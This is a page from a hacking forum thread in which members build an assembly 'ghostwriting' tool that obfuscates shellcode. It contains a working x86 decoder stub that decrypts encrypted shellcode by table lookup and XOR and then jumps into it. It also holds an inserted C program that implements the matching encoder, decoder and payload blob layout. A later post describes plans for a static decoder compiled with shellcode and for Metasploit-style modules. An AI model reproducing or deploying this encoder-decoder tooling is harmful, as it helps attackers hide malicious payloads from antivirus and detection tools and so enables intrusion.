Page 2 of 2 (results 11 to 14 of 14)

Thread: Part one of an ASM ghostwriting PoC script

  1. #11 ShadowMaster (Senior Member; joined Jul 2011; location /root; 189 posts)

    Re: Part one of an ASM ghostwriting PoC script

    So the way I see it is this:
    JNZ, JZ sets ZF to 0
    TEST and CMP set ZF to 1 IF the values are equal and 0 otherwise.
    And the rest I have no idea what you said... :P

    I need things to be a little more clearly explained, sorry...
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  2. #12 ShadowMaster (Senior Member; joined Jul 2011; location /root; 189 posts)

    Re: Part one of an ASM ghostwriting PoC script

    I added JMP, JNZ, JZ, JNE, JE, JNS, JS, CMP, and TEST support in the newest version.

    I believe I am now ready to work on the obfuscators, unless someone tells me otherwise.

    I do not have JGE, JG, JLE, and JL support as described in my readme.

    Also, this is now on github https://github.com/Shadow-Master/

    Let me know what you guys think, and whether you have any ideas for obfuscating...
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  3. #13 Good friend of the forums (joined Jun 2008; 425 posts)

    Re: Part one of an ASM ghostwriting PoC script

    Hi, some obfuscating code. The code probably needs modifying.
    Three parts:
    256-byte array for random stuff
    16-byte array for the password
    0xf0 bytes for the shellcode


    ; Layout, contiguous at [esp]: 256-byte random array, 16-byte password, 0xf0 bytes of encrypted shellcode.
    ; The random array must be a permutation of 0..255 so the encoder can invert the lookup.
    mov eax, 0x01400101    ; fixed scratch address ("empty spot on heap"; must be mapped, writable and executable)
    and eax, 0xffffff      ; eax = 0x00400101
    mov ebx, esp           ; ebx = source blob (random array | password | encrypted shellcode)
    xor ecx, ecx

    top:
    mov edx, [ebx+ecx]     ; copy the 256-byte random array, 4 bytes per iteration
    mov [eax+ecx], edx
    add ecx, 0x04
    cmp ecx, 0x100         ; stop at 256 (ecx steps by 4, so 0xff would never be hit)
    jnz top

    top1:
    mov edx, [ebx+ecx]     ; copy the 16-byte password to [eax+0x100]
    mov [eax+ecx], edx
    add ecx, 0x04
    cmp ecx, 0x110         ; 256 + 16
    jnz top1

    lea esi, [eax+ecx]     ; esi = destination of the decrypted shellcode (eax+0x110)
    xor ecx, ecx           ; ecx now indexes shellcode bytes 0..0xef

    top2:
    movzx edi, byte [ebx+ecx+0x110] ; grab one encrypted byte
    mov dl, [eax+edi]      ; look it up in the random array
    mov edi, ecx
    and edi, 0x0f          ; password index = byte offset mod 16
    xor dl, [eax+edi+0x100] ; xor with the password byte
    mov [esi+ecx], dl      ; store the decrypted byte
    inc ecx                ; move to next byte
    cmp ecx, 0xf0          ; length of shellcode
    jnz top2

    jmp esi                ; jump to decrypted code
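An added example (not code from the thread or from ShadowMaster's script): a host-side encoder and the matching decoder for the scheme in the post above, where each byte is recovered as plain[i] = random[enc[i]] ^ password[i % 16]. It assumes the 256-byte random array is a permutation built from a seeded xorshift PRNG (so the encoder can invert it), a 16-byte test key, and constructed filler bytes in place of real shellcode; the helper names (make_sbox, encode_code, decode_code, build_blob, roundtrip_ok) are this example's own.

```c
/* Added example, not code from the thread: encoder plus matching decoder for the
 * random-array lookup + password XOR scheme. Decoder: plain[i] = sbox[enc[i]] ^ key[i % 16].
 * All inputs below are constructed test data, not a payload. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SBOX_LEN 256
#define KEY_LEN  16
#define CODE_LEN 0xf0
#define BLOB_LEN (SBOX_LEN + KEY_LEN + CODE_LEN)   /* 0x200 bytes: sbox | key | encoded code */

/* Tiny xorshift PRNG (assumption of this example); a fixed seed keeps it reproducible. */
static uint32_t xorshift32(uint32_t *state) {
    uint32_t x = *state;
    x ^= x << 13; x ^= x >> 17; x ^= x << 5;
    return *state = x;
}

/* Fisher-Yates shuffle of 0..255 so every byte value appears exactly once. */
void make_sbox(uint8_t sbox[SBOX_LEN], uint32_t seed) {
    uint32_t st = seed ? seed : 1;
    for (int i = 0; i < SBOX_LEN; i++) sbox[i] = (uint8_t)i;
    for (int i = SBOX_LEN - 1; i > 0; i--) {
        int j = (int)(xorshift32(&st) % (uint32_t)(i + 1));
        uint8_t t = sbox[i]; sbox[i] = sbox[j]; sbox[j] = t;
    }
}

/* Returns 1 if every value 0..255 occurs exactly once (the property the encoder needs). */
int sbox_is_permutation(const uint8_t sbox[SBOX_LEN]) {
    uint8_t seen[SBOX_LEN] = {0};
    for (int i = 0; i < SBOX_LEN; i++) {
        if (seen[sbox[i]]) return 0;
        seen[sbox[i]] = 1;
    }
    return 1;
}

/* Convenience for checking: build an sbox from a seed and verify it is a permutation. */
int seeded_sbox_ok(uint32_t seed) {
    uint8_t s[SBOX_LEN];
    make_sbox(s, seed);
    return sbox_is_permutation(s);
}

/* Encoder: enc[i] = inv_sbox[plain[i] ^ key[i % 16]], the exact inverse of the decoder. */
void encode_code(const uint8_t *plain, uint8_t *enc, size_t n,
                 const uint8_t sbox[SBOX_LEN], const uint8_t key[KEY_LEN]) {
    uint8_t inv[SBOX_LEN];
    for (int i = 0; i < SBOX_LEN; i++) inv[sbox[i]] = (uint8_t)i;
    for (size_t i = 0; i < n; i++) enc[i] = inv[plain[i] ^ key[i % KEY_LEN]];
}

/* Decoder: does in C, byte by byte, what the asm loop above does. */
void decode_code(const uint8_t *enc, uint8_t *plain, size_t n,
                 const uint8_t sbox[SBOX_LEN], const uint8_t key[KEY_LEN]) {
    for (size_t i = 0; i < n; i++) plain[i] = sbox[enc[i]] ^ key[i % KEY_LEN];
}

/* Lays out sbox | key | encoded code contiguously, the blob the stub reads from [esp]. */
size_t build_blob(uint8_t out[BLOB_LEN], const uint8_t sbox[SBOX_LEN],
                  const uint8_t key[KEY_LEN], const uint8_t enc[CODE_LEN]) {
    memcpy(out, sbox, SBOX_LEN);
    memcpy(out + SBOX_LEN, key, KEY_LEN);
    memcpy(out + SBOX_LEN + KEY_LEN, enc, CODE_LEN);
    return BLOB_LEN;
}

/* Round trip on constructed filler "shellcode": 1 if decode(encode(x)) == x and the
 * encoded bytes actually differ from the plaintext. */
int roundtrip_ok(uint32_t seed) {
    uint8_t sbox[SBOX_LEN], key[KEY_LEN], plain[CODE_LEN], enc[CODE_LEN], dec[CODE_LEN];
    uint8_t blob[BLOB_LEN];
    make_sbox(sbox, seed);
    memcpy(key, "constructed-key!", KEY_LEN);                /* 16-byte test key only */
    for (int i = 0; i < CODE_LEN; i++) plain[i] = (uint8_t)(0x90 + i * 7); /* filler bytes */
    encode_code(plain, enc, CODE_LEN, sbox, key);
    build_blob(blob, sbox, key, enc);
    /* Decode straight out of the blob, using the same offsets the stub uses. */
    decode_code(blob + SBOX_LEN + KEY_LEN, dec, CODE_LEN, blob, blob + SBOX_LEN);
    return memcmp(dec, plain, CODE_LEN) == 0 && memcmp(enc, plain, CODE_LEN) != 0;
}

int main(void) {
    printf("sbox is a permutation: %d\n", seeded_sbox_ok(0x1234));
    printf("round trip ok: %d\n", roundtrip_ok(0x1234));
    return 0;
}
```

Because the encoder inverts the lookup table, the decoder stub only ever needs the forward table, which is why the random array can be shipped alongside the password and the encoded bytes in one contiguous blob.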

  4. #14 ShadowMaster (Senior Member; joined Jul 2011; location /root; 189 posts)

    Re: Part one of an ASM ghostwriting PoC script

    Very cool. I am going to add a new mode with a static decoder to be compiled with the shellcode to use this, and similar, functions.
    Where I stand now is to come up with some sort of general outline for an engine to produce ASM code to obtain a specific value in a specific spot. No specifics, just generalities.
    Also, I need to finish making an outline for community produced Line-by-line replacement modules, then finish implementing -l|line-by-line in the script.

    When I make at least one module for each instruction, and can replace them without error, then I will post them, and post the rules for making modules, similar to the msf.
    World Domination is such an ugly phrase. I prefer the term World Optimization.
